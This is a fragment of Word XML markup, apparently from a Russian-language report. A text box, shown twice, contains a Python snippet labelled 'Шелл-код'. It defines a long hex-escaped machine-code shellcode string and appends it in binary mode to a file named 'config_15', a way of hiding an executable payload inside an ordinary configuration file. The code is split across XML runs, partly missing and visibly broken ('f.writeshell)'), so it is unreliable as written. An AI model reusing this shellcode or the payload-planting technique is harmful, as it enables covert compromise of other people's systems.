                            <w:r w:rsidRPr="007A1356">
                              <w:t>xc</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00BD4AE8">
                              <w:rPr>
                                <w:lang w:val="ru-RU"/>
                              </w:rPr>
                              <w:t>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41\</w:t>
                            </w:r>
                            <w:r w:rsidRPr="007A1356">
                              <w:t>xad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01\</w:t>
                            </w:r>
                            <w:r w:rsidRPr="007A1356">
                              <w:t>xd</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00BD4AE8">
                              <w:rPr>
                                <w:lang w:val="ru-RU"/>
                              </w:rPr>
                              <w:t>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47\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75\</w:t>
                            </w:r>
                            <w:r w:rsidRPr="007A1356">
                              <w:t>xf</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00BD4AE8">
                              <w:rPr>
                                <w:lang w:val="ru-RU"/>
                              </w:rPr>
                              <w:t>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75\</w:t>
                            </w:r>
                            <w:r w:rsidRPr="007A1356">
                              <w:t>xeb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75\</w:t>
                            </w:r>
                            <w:r w:rsidRPr="007A1356">
                              <w:t>xe</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00BD4AE8">
                              <w:rPr>
                                <w:lang w:val="ru-RU"/>
                              </w:rPr>
                              <w:t>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24\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01\</w:t>
                            </w:r>
                            <w:r w:rsidRPr="007A1356">
                              <w:t>xde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66\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</w:t>
                            </w:r>
                            <w:r w:rsidRPr="007A1356">
                              <w:t>e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1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01\</w:t>
                            </w:r>
                            <w:r w:rsidRPr="007A1356">
                              <w:t>xde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b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14\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</w:t>
                            </w:r>
                            <w:r w:rsidRPr="007A1356">
                              <w:t>e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01\</w:t>
                            </w:r>
                            <w:r w:rsidRPr="007A1356">
                              <w:t>xda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89\</w:t>
                            </w:r>
                            <w:r w:rsidRPr="007A1356">
                              <w:t>xd</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00BD4AE8">
                              <w:rPr>
                                <w:lang w:val="ru-RU"/>
                              </w:rPr>
                              <w:t>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31\</w:t>
                            </w:r>
                            <w:r w:rsidRPr="007A1356">
                              <w:t>xc</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00BD4AE8">
                              <w:rPr>
                                <w:lang w:val="ru-RU"/>
                              </w:rPr>
                              <w:t>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53\</w:t>
                            </w:r>
                            <w:r w:rsidRPr="007A1356">
                              <w:t>xff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xd</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00BD4AE8">
                              <w:rPr>
                                <w:lang w:val="ru-RU"/>
                              </w:rPr>
                              <w:t>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66\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24\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2</w:t>
                            </w:r>
                            <w:r w:rsidRPr="007A1356">
                              <w:t>e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54\</w:t>
                            </w:r>
                            <w:r w:rsidRPr="007A1356">
                              <w:t>xff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xd</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00BD4AE8">
                              <w:rPr>
                                <w:lang w:val="ru-RU"/>
                              </w:rPr>
                              <w:t>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66\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24\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67\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</w:t>
                            </w:r>
                            <w:r w:rsidRPr="007A1356">
                              <w:t>d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50\</w:t>
                            </w:r>
                            <w:r w:rsidRPr="007A1356">
                              <w:t>xff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xd</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00BD4AE8">
                              <w:rPr>
                                <w:lang w:val="ru-RU"/>
                              </w:rPr>
                              <w:t>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96\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31\</w:t>
                            </w:r>
                            <w:r w:rsidRPr="007A1356">
                              <w:t>xc</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00BD4AE8">
                              <w:rPr>
                                <w:lang w:val="ru-RU"/>
                              </w:rPr>
                              <w:t>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D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47\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53\</w:t>
                            </w:r>
                            <w:r w:rsidRPr="007A1356">
                              <w:t>xFF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xD</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00BD4AE8">
                              <w:rPr>
                                <w:lang w:val="ru-RU"/>
                              </w:rPr>
                              <w:t>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83\</w:t>
                            </w:r>
                            <w:r w:rsidRPr="007A1356">
                              <w:t>xEC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10\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89\</w:t>
                            </w:r>
                            <w:r w:rsidRPr="007A1356">
                              <w:t>xE</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00BD4AE8">
                              <w:rPr>
                                <w:lang w:val="ru-RU"/>
                              </w:rPr>
                              <w:t>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53\</w:t>
                            </w:r>
                            <w:r w:rsidRPr="007A1356">
                              <w:t>xFF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xD</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00BD4AE8">
                              <w:rPr>
                                <w:lang w:val="ru-RU"/>
                              </w:rPr>
                              <w:t>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31\</w:t>
                            </w:r>
                            <w:r w:rsidRPr="007A1356">
                              <w:t>xc</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00BD4AE8">
                              <w:rPr>
                                <w:lang w:val="ru-RU"/>
                              </w:rPr>
                              <w:t>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</w:t>
                            </w:r>
                            <w:r w:rsidRPr="007A1356">
                              <w:t>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xb</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00BD4AE8">
                              <w:rPr>
                                <w:lang w:val="ru-RU"/>
                              </w:rPr>
                              <w:t>7\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90\</w:t>
                            </w:r>
                            <w:r w:rsidRPr="007A1356">
                              <w:t>xB</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00BD4AE8">
                              <w:rPr>
                                <w:lang w:val="ru-RU"/>
                              </w:rPr>
                              <w:t>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</w:t>
                            </w:r>
                            <w:r w:rsidRPr="007A1356">
                              <w:t>A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xF</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00BD4AE8">
                              <w:rPr>
                                <w:lang w:val="ru-RU"/>
                              </w:rPr>
                              <w:t>6\</w:t>
                            </w:r>
                            <w:r w:rsidRPr="007A1356">
                              <w:t>xF</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00BD4AE8">
                              <w:rPr>
                                <w:lang w:val="ru-RU"/>
                              </w:rPr>
                              <w:t>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80\</w:t>
                            </w:r>
                            <w:r w:rsidRPr="007A1356">
                              <w:t>xC</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00BD4AE8">
                              <w:rPr>
                                <w:lang w:val="ru-RU"/>
                              </w:rPr>
                              <w:t>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2</w:t>
                            </w:r>
                            <w:r w:rsidRPr="007A1356">
                              <w:t>E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20\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</w:t>
                            </w:r>
                            <w:r w:rsidRPr="007A1356">
                              <w:t>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xB</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00BD4AE8">
                              <w:rPr>
                                <w:lang w:val="ru-RU"/>
                              </w:rPr>
                              <w:t>7\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06\</w:t>
                            </w:r>
                            <w:r w:rsidRPr="007A1356">
                              <w:t>xB</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00BD4AE8">
                              <w:rPr>
                                <w:lang w:val="ru-RU"/>
                              </w:rPr>
                              <w:t>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</w:t>
                            </w:r>
                            <w:r w:rsidRPr="007A1356">
                              <w:t>A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xF</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00BD4AE8">
                              <w:rPr>
                                <w:lang w:val="ru-RU"/>
                              </w:rPr>
                              <w:t>6\</w:t>
                            </w:r>
                            <w:r w:rsidRPr="007A1356">
                              <w:t>xF</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00BD4AE8">
                              <w:rPr>
                                <w:lang w:val="ru-RU"/>
                              </w:rPr>
                              <w:t>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80\</w:t>
                            </w:r>
                            <w:r w:rsidRPr="007A1356">
                              <w:t>xC</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00BD4AE8">
                              <w:rPr>
                                <w:lang w:val="ru-RU"/>
                              </w:rPr>
                              <w:t>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2</w:t>
                            </w:r>
                            <w:r w:rsidRPr="007A1356">
                              <w:t>E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20\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89\</w:t>
                            </w:r>
                            <w:r w:rsidRPr="007A1356">
                              <w:t>xE</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00BD4AE8">
                              <w:rPr>
                                <w:lang w:val="ru-RU"/>
                              </w:rPr>
                              <w:t>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31\</w:t>
                            </w:r>
                            <w:r w:rsidRPr="007A1356">
                              <w:t>xC</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00BD4AE8">
                              <w:rPr>
                                <w:lang w:val="ru-RU"/>
                              </w:rPr>
                              <w:t>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90\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96\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77\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E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89\</w:t>
                            </w:r>
                            <w:r w:rsidRPr="007A1356">
                              <w:t>xE</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00BD4AE8">
                              <w:rPr>
                                <w:lang w:val="ru-RU"/>
                              </w:rPr>
                              <w:t>7\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A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57\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A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00\</w:t>
                            </w:r>
                            <w:r w:rsidRPr="007A1356">
                              <w:t>xFF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xD</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00BD4AE8">
                              <w:rPr>
                                <w:lang w:val="ru-RU"/>
                              </w:rPr>
                              <w:t>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66\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83\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c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24\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61\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72\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</w:t>
                            </w:r>
                            <w:r w:rsidRPr="007A1356">
                              <w:t>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63\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45\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78\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69\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74\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54\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53\</w:t>
                            </w:r>
                            <w:r w:rsidRPr="007A1356">
                              <w:t>xff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xd</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00BD4AE8">
                              <w:rPr>
                                <w:lang w:val="ru-RU"/>
                              </w:rPr>
                              <w:t>5\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31\</w:t>
                            </w:r>
                            <w:r w:rsidRPr="007A1356">
                              <w:t>xc</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00BD4AE8">
                              <w:rPr>
                                <w:lang w:val="ru-RU"/>
                              </w:rPr>
                              <w:t>9\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51\</w:t>
                            </w:r>
                            <w:r w:rsidRPr="007A1356">
                              <w:t>xff</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00BD4AE8">
                              <w:rPr>
                                <w:lang w:val="ru-RU"/>
                              </w:rPr>
                              <w:t>\</w:t>
                            </w:r>
                            <w:r w:rsidRPr="007A1356">
                              <w:t>xd</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00BD4AE8">
                              <w:rPr>
                                <w:lang w:val="ru-RU"/>
                              </w:rPr>
                              <w:t>0\</w:t>
                            </w:r>
                            <w:r w:rsidRPr="007A1356">
                              <w:t>x</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00BD4AE8">
                              <w:rPr>
                                <w:lang w:val="ru-RU"/>
                              </w:rPr>
                              <w:t>00</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6425F710" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="00BD4AE8" w:rsidRDefault="007A1356" w:rsidP="007A1356">
                            <w:pPr>
                              <w:pStyle w:val="a6"/>
                              <w:rPr>
                                <w:lang w:val="ru-RU"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="1F841F5E" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="00BD4AE8" w:rsidRDefault="007A1356" w:rsidP="007A1356">
                            <w:pPr>
                              <w:pStyle w:val="a6"/>
                              <w:rPr>
                                <w:lang w:val="ru-RU"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00BD4AE8">
                              <w:rPr>
                                <w:lang w:val="ru-RU"/>
                              </w:rPr>
                              <w:t># Открытие файла в режиме добавления</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2AB42AF9" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="00BD4AE8" w:rsidRDefault="007A1356" w:rsidP="007A1356">
                            <w:pPr>
                              <w:pStyle w:val="a6"/>
                              <w:rPr>
                                <w:lang w:val="ru-RU"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="007A1356">
                              <w:t>with</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00BD4AE8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7A1356">
                              <w:t>open</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00BD4AE8">
                              <w:rPr>
                                <w:lang w:val="ru-RU"/>
                              </w:rPr>
                              <w:t>("</w:t>
                            </w:r>
                            <w:r w:rsidRPr="007A1356">
                              <w:t>config</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00BD4AE8">
                              <w:rPr>
                                <w:lang w:val="ru-RU"/>
                              </w:rPr>
                              <w:t>_15", "</w:t>
                            </w:r>
                            <w:r w:rsidRPr="007A1356">
                              <w:t>ab</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00BD4AE8">
                              <w:rPr>
                                <w:lang w:val="ru-RU"/>
                              </w:rPr>
                              <w:t xml:space="preserve">") </w:t>
                            </w:r>
                            <w:r w:rsidRPr="007A1356">
                              <w:t>as</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00BD4AE8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7A1356">
                              <w:t>f</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00BD4AE8">
                              <w:rPr>
                                <w:lang w:val="ru-RU"/>
                              </w:rPr>
                              <w:t>:</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5CE1536B" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
                            <w:pPr>
                              <w:pStyle w:val="a6"/>
                            </w:pPr>
                            <w:r w:rsidRPr="007A1356">
                              <w:t> </w:t>
                            </w:r>
                            <w:r w:rsidRPr="00BD4AE8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7A1356">
                              <w:t> </w:t>
                            </w:r>
                            <w:r w:rsidRPr="00BD4AE8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7A1356">
                              <w:t>f.writeshell)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5295CD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45.35pt;height:26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">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="4D571FA6" w14:textId="77777777" w:rsidR="00A75863" w:rsidRDefault="007A1356" w:rsidP="007A1356">
                      <w:pPr>
                        <w:pStyle w:val="a6"/>
                        <w:rPr>
                          <w:lang w:val="ru-RU"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="007A1356">
                        <w:rPr>
                          <w:lang w:val="ru-RU"/>
                        </w:rPr>
                        <w:t xml:space="preserve"># Шелл-код </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3C2377D5" w14:textId="77777777" w:rsidR="00A75863" w:rsidRDefault="00A75863" w:rsidP="007A1356">
                      <w:pPr>
                        <w:pStyle w:val="a6"/>
                        <w:rPr>
                          <w:lang w:val="ru-RU"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="147EEBBA" w14:textId="2265F2E1" w:rsidR="007A1356" w:rsidRPr="00BD4AE8" w:rsidRDefault="007A1356" w:rsidP="007A1356">
                      <w:pPr>
                        <w:pStyle w:val="a6"/>
                        <w:rPr>
                          <w:lang w:val="ru-RU"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="007A1356">
                        <w:t>shell</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00BD4AE8">
                        <w:rPr>
                          <w:lang w:val="ru-RU"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> = 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"\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31\</w:t>
                      </w:r>
                      <w:r w:rsidRPr="007A1356">
                        <w:t>xc</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00BD4AE8">
                        <w:rPr>
                          <w:lang w:val="ru-RU"/>
                        </w:rPr>
                        <w:t>9\</w:t>
                      </w:r>
                      <w:r w:rsidRPr="007A1356">
                        <w:t>xf</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00BD4AE8">
                        <w:rPr>
                          <w:lang w:val="ru-RU"/>
                        </w:rPr>
                        <w:t>7\</w:t>
                      </w:r>
                      <w:r w:rsidRPr="007A1356">
                        <w:t>xe</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00BD4AE8">
                        <w:rPr>
                          <w:lang w:val="ru-RU"/>
                        </w:rPr>
                        <w:t>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14\</w:t>
                      </w:r>
                      <w:r w:rsidRPr="007A1356">
                        <w:t>xad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96\</w:t>
                      </w:r>
                      <w:r w:rsidRPr="007A1356">
                        <w:t>xad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10\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01\</w:t>
                      </w:r>
                      <w:r w:rsidRPr="007A1356">
                        <w:t>xda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01\</w:t>
                      </w:r>
                      <w:r w:rsidRPr="007A1356">
                        <w:t>xda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20\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01\</w:t>
                      </w:r>
                      <w:r w:rsidRPr="007A1356">
                        <w:t>xde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31\</w:t>
                      </w:r>
                      <w:r w:rsidRPr="007A1356">
                        <w:t>xc</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00BD4AE8">
                        <w:rPr>
                          <w:lang w:val="ru-RU"/>
                        </w:rPr>
                        <w:t>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41\</w:t>
                      </w:r>
                      <w:r w:rsidRPr="007A1356">
                        <w:t>xad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01\</w:t>
                      </w:r>
                      <w:r w:rsidRPr="007A1356">
                        <w:t>xd</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00BD4AE8">
                        <w:rPr>
                          <w:lang w:val="ru-RU"/>
                        </w:rPr>
                        <w:t>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47\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75\</w:t>
                      </w:r>
                      <w:r w:rsidRPr="007A1356">
                        <w:t>xf</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00BD4AE8">
                        <w:rPr>
                          <w:lang w:val="ru-RU"/>
                        </w:rPr>
                        <w:t>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75\</w:t>
                      </w:r>
                      <w:r w:rsidRPr="007A1356">
                        <w:t>xeb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75\</w:t>
                      </w:r>
                      <w:r w:rsidRPr="007A1356">
                        <w:t>xe</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00BD4AE8">
                        <w:rPr>
                          <w:lang w:val="ru-RU"/>
                        </w:rPr>
                        <w:t>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24\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01\</w:t>
                      </w:r>
                      <w:r w:rsidRPr="007A1356">
                        <w:t>xde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66\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</w:t>
                      </w:r>
                      <w:r w:rsidRPr="007A1356">
                        <w:t>e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1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01\</w:t>
                      </w:r>
                      <w:r w:rsidRPr="007A1356">
                        <w:t>xde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b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14\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</w:t>
                      </w:r>
                      <w:r w:rsidRPr="007A1356">
                        <w:t>e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01\</w:t>
                      </w:r>
                      <w:r w:rsidRPr="007A1356">
                        <w:t>xda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89\</w:t>
                      </w:r>
                      <w:r w:rsidRPr="007A1356">
                        <w:t>xd</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00BD4AE8">
                        <w:rPr>
                          <w:lang w:val="ru-RU"/>
                        </w:rPr>
                        <w:t>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31\</w:t>
                      </w:r>
                      <w:r w:rsidRPr="007A1356">
                        <w:t>xc</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00BD4AE8">
                        <w:rPr>
                          <w:lang w:val="ru-RU"/>
                        </w:rPr>
                        <w:t>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53\</w:t>
                      </w:r>
                      <w:r w:rsidRPr="007A1356">
                        <w:t>xff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xd</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00BD4AE8">
                        <w:rPr>
                          <w:lang w:val="ru-RU"/>
                        </w:rPr>
                        <w:t>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66\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24\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2</w:t>
                      </w:r>
                      <w:r w:rsidRPr="007A1356">
                        <w:t>e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54\</w:t>
                      </w:r>
                      <w:r w:rsidRPr="007A1356">
                        <w:t>xff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xd</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00BD4AE8">
                        <w:rPr>
                          <w:lang w:val="ru-RU"/>
                        </w:rPr>
                        <w:t>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66\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24\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67\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</w:t>
                      </w:r>
                      <w:r w:rsidRPr="007A1356">
                        <w:t>d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50\</w:t>
                      </w:r>
                      <w:r w:rsidRPr="007A1356">
                        <w:t>xff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xd</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00BD4AE8">
                        <w:rPr>
                          <w:lang w:val="ru-RU"/>
                        </w:rPr>
                        <w:t>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96\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31\</w:t>
                      </w:r>
                      <w:r w:rsidRPr="007A1356">
                        <w:t>xc</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00BD4AE8">
                        <w:rPr>
                          <w:lang w:val="ru-RU"/>
                        </w:rPr>
                        <w:t>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D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47\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53\</w:t>
                      </w:r>
                      <w:r w:rsidRPr="007A1356">
                        <w:t>xFF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xD</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00BD4AE8">
                        <w:rPr>
                          <w:lang w:val="ru-RU"/>
                        </w:rPr>
                        <w:t>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83\</w:t>
                      </w:r>
                      <w:r w:rsidRPr="007A1356">
                        <w:t>xEC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10\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89\</w:t>
                      </w:r>
                      <w:r w:rsidRPr="007A1356">
                        <w:t>xE</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00BD4AE8">
                        <w:rPr>
                          <w:lang w:val="ru-RU"/>
                        </w:rPr>
                        <w:t>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53\</w:t>
                      </w:r>
                      <w:r w:rsidRPr="007A1356">
                        <w:t>xFF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xD</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00BD4AE8">
                        <w:rPr>
                          <w:lang w:val="ru-RU"/>
                        </w:rPr>
                        <w:t>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31\</w:t>
                      </w:r>
                      <w:r w:rsidRPr="007A1356">
                        <w:t>xc</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00BD4AE8">
                        <w:rPr>
                          <w:lang w:val="ru-RU"/>
                        </w:rPr>
                        <w:t>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</w:t>
                      </w:r>
                      <w:r w:rsidRPr="007A1356">
                        <w:t>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xb</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00BD4AE8">
                        <w:rPr>
                          <w:lang w:val="ru-RU"/>
                        </w:rPr>
                        <w:t>7\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90\</w:t>
                      </w:r>
                      <w:r w:rsidRPr="007A1356">
                        <w:t>xB</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00BD4AE8">
                        <w:rPr>
                          <w:lang w:val="ru-RU"/>
                        </w:rPr>
                        <w:t>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</w:t>
                      </w:r>
                      <w:r w:rsidRPr="007A1356">
                        <w:t>A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xF</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00BD4AE8">
                        <w:rPr>
                          <w:lang w:val="ru-RU"/>
                        </w:rPr>
                        <w:t>6\</w:t>
                      </w:r>
                      <w:r w:rsidRPr="007A1356">
                        <w:t>xF</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00BD4AE8">
                        <w:rPr>
                          <w:lang w:val="ru-RU"/>
                        </w:rPr>
                        <w:t>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80\</w:t>
                      </w:r>
                      <w:r w:rsidRPr="007A1356">
                        <w:t>xC</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00BD4AE8">
                        <w:rPr>
                          <w:lang w:val="ru-RU"/>
                        </w:rPr>
                        <w:t>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2</w:t>
                      </w:r>
                      <w:r w:rsidRPr="007A1356">
                        <w:t>E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20\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</w:t>
                      </w:r>
                      <w:r w:rsidRPr="007A1356">
                        <w:t>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xB</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00BD4AE8">
                        <w:rPr>
                          <w:lang w:val="ru-RU"/>
                        </w:rPr>
                        <w:t>7\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06\</w:t>
                      </w:r>
                      <w:r w:rsidRPr="007A1356">
                        <w:t>xB</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00BD4AE8">
                        <w:rPr>
                          <w:lang w:val="ru-RU"/>
                        </w:rPr>
                        <w:t>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</w:t>
                      </w:r>
                      <w:r w:rsidRPr="007A1356">
                        <w:t>A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xF</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00BD4AE8">
                        <w:rPr>
                          <w:lang w:val="ru-RU"/>
                        </w:rPr>
                        <w:t>6\</w:t>
                      </w:r>
                      <w:r w:rsidRPr="007A1356">
                        <w:t>xF</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00BD4AE8">
                        <w:rPr>
                          <w:lang w:val="ru-RU"/>
                        </w:rPr>
                        <w:t>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80\</w:t>
                      </w:r>
                      <w:r w:rsidRPr="007A1356">
                        <w:t>xC</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00BD4AE8">
                        <w:rPr>
                          <w:lang w:val="ru-RU"/>
                        </w:rPr>
                        <w:t>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2</w:t>
                      </w:r>
                      <w:r w:rsidRPr="007A1356">
                        <w:t>E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20\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89\</w:t>
                      </w:r>
                      <w:r w:rsidRPr="007A1356">
                        <w:t>xE</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00BD4AE8">
                        <w:rPr>
                          <w:lang w:val="ru-RU"/>
                        </w:rPr>
                        <w:t>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31\</w:t>
                      </w:r>
                      <w:r w:rsidRPr="007A1356">
                        <w:t>xC</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00BD4AE8">
                        <w:rPr>
                          <w:lang w:val="ru-RU"/>
                        </w:rPr>
                        <w:t>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90\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96\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77\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E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89\</w:t>
                      </w:r>
                      <w:r w:rsidRPr="007A1356">
                        <w:t>xE</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00BD4AE8">
                        <w:rPr>
                          <w:lang w:val="ru-RU"/>
                        </w:rPr>
                        <w:t>7\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A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57\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A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00\</w:t>
                      </w:r>
                      <w:r w:rsidRPr="007A1356">
                        <w:t>xFF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xD</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00BD4AE8">
                        <w:rPr>
                          <w:lang w:val="ru-RU"/>
                        </w:rPr>
                        <w:t>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66\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83\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c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24\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61\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72\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</w:t>
                      </w:r>
                      <w:r w:rsidRPr="007A1356">
                        <w:t>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63\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45\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78\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69\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74\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54\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53\</w:t>
                      </w:r>
                      <w:r w:rsidRPr="007A1356">
                        <w:t>xff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xd</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00BD4AE8">
                        <w:rPr>
                          <w:lang w:val="ru-RU"/>
                        </w:rPr>
                        <w:t>5\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31\</w:t>
                      </w:r>
                      <w:r w:rsidRPr="007A1356">
                        <w:t>xc</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00BD4AE8">
                        <w:rPr>
                          <w:lang w:val="ru-RU"/>
                        </w:rPr>
                        <w:t>9\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51\</w:t>
                      </w:r>
                      <w:r w:rsidRPr="007A1356">
                        <w:t>xff</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00BD4AE8">
                        <w:rPr>
                          <w:lang w:val="ru-RU"/>
                        </w:rPr>
                        <w:t>\</w:t>
                      </w:r>
                      <w:r w:rsidRPr="007A1356">
                        <w:t>xd</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00BD4AE8">
                        <w:rPr>
                          <w:lang w:val="ru-RU"/>
                        </w:rPr>
                        <w:t>0\</w:t>
                      </w:r>
                      <w:r w:rsidRPr="007A1356">
                        <w:t>x</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00BD4AE8">
                        <w:rPr>
                          <w:lang w:val="ru-RU"/>
                        </w:rPr>
                        <w:t>00</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="6425F710" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="00BD4AE8" w:rsidRDefault="007A1356" w:rsidP="007A1356">
                      <w:pPr>
                        <w:pStyle w:val="a6"/>
                        <w:rPr>
                          <w:lang w:val="ru-RU"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="1F841F5E" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="00BD4AE8" w:rsidRDefault="007A1356" w:rsidP="007A1356">
                      <w:pPr>
                        <w:pStyle w:val="a6"/>
                        <w:rPr>
                          <w:lang w:val="ru-RU"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00BD4AE8">
                        <w:rPr>
                          <w:lang w:val="ru-RU"/>
                        </w:rPr>
                        <w:t># Открытие файла в режиме добавления</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2AB42AF9" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="00BD4AE8" w:rsidRDefault="007A1356" w:rsidP="007A1356">
                      <w:pPr>
                        <w:pStyle w:val="a6"/>
                        <w:rPr>
                          <w:lang w:val="ru-RU"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="007A1356">
                        <w:t>with</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00BD4AE8">
                        <w:rPr>
                          <w:lang w:val="ru-RU"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r w:rsidRPr="007A1356">
                        <w:t>open</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00BD4AE8">
                        <w:rPr>
                          <w:lang w:val="ru-RU"/>
                        </w:rPr>
                        <w:t>("</w:t>
                      </w:r>
                      <w:r w:rsidRPr="007A1356">
                        <w:t>config</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00BD4AE8">
                        <w:rPr>
                          <w:lang w:val="ru-RU"/>
                        </w:rPr>
                        <w:t>_15", "</w:t>
                      </w:r>
                      <w:r w:rsidRPr="007A1356">
                        <w:t>ab</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00BD4AE8">
                        <w:rPr>
                          <w:lang w:val="ru-RU"/>
                        </w:rPr>
                        <w:t xml:space="preserve">") </w:t>
                      </w:r>
                      <w:r w:rsidRPr="007A1356">
                        <w:t>as</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00BD4AE8">
                        <w:rPr>
                          <w:lang w:val="ru-RU"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r w:rsidRPr="007A1356">
                        <w:t>f</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00BD4AE8">
                        <w:rPr>
                          <w:lang w:val="ru-RU"/>
                        </w:rPr>
                        <w:t>:</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5CE1536B" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
                      <w:pPr>
                        <w:pStyle w:val="a6"/>
                      </w:pPr>
                      <w:r w:rsidRPr="007A1356">
                        <w:t> </w:t>
                      </w:r>
                      <w:r w:rsidRPr="00BD4AE8">
                        <w:rPr>
                          <w:lang w:val="ru-RU"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r w:rsidRPr="007A1356">
                        <w:t> </w:t>
                      </w:r>
                      <w:r w:rsidRPr="00BD4AE8">
                        <w:rPr>
                          <w:lang w:val="ru-RU"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r w:rsidRPr="007A1356">
                        <w:t>f.writeshell)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9E426C" w14:textId="1A672864" w:rsidR="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
